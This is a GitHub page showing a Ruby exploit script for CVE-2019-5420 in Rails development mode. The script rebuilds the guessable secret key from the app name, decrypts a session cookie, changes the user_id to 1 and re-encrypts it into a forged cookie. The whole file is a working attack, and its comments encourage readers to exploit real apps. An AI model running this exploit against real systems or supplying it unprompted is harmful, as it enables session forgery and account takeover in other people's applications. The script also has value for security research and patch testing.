-
Notifications
You must be signed in to change notification settings - Fork 2
/
CVE-2019-5420.rb
59 lines (40 loc) · 1.59 KB
/
CVE-2019-5420.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
## appreesh to the real brainlets that push sec. research into the dark unexplored depths
## CVE discovered by: ooooooo_q @ hackerone
require 'OpenSSL'
require 'Base64'
require 'URI'
## enter cookie from the development-mode rails app y'all finna exploit, it won't work in test or deployment
cookie=URI.decode "<y'all cookie from the development rails app goes here>"
#put the rails app name below - if you don't know, try harder and enumerate :)
def secret
secret = Digest::MD5.hexdigest("<insert app name>::Application")
OpenSSL::PKCS5.pbkdf2_hmac_sha1(secret, "authenticated encrypted cookie", 1000, 32)
end
cipher = OpenSSL::Cipher.new("aes-256-gcm")
encrypted_data, iv, auth_tag = cookie.split("--").map { |v| ::Base64.strict_decode64(v) }
#encrypt, whip it, decrypt it
cipher.decrypt
cipher.key = secret
cipher.iv = iv
cipher.auth_tag = auth_tag
cipher.auth_data = ""
decrypted_data = cipher.update(encrypted_data)
decrypted_data << cipher.final
puts decrypted_data
#this is an exploit for the json serializations flavor, if its hybrid or marshall.load i'm sure another blog can help you out :)
require 'json'
data = JSON.parse decrypted_data
data['user_id']=1
#more crypto witchcraft
puts data
cipher = OpenSSL::Cipher.new("aes-256-gcm")
cipher.encrypt
cipher.key = secret
iv = cipher.random_iv
cipher.auth_data = ""
encrypted_data = cipher.update(data.to_json)
encrypted_data << cipher.final
#fat nasty blob is ready 4 u
blob = "#{::Base64.strict_encode64 encrypted_data}--#{::Base64.strict_encode64 iv}"
blob = "#{blob}--#{::Base64.strict_encode64 cipher.auth_tag}"
puts URI.escape(blob,"=/+")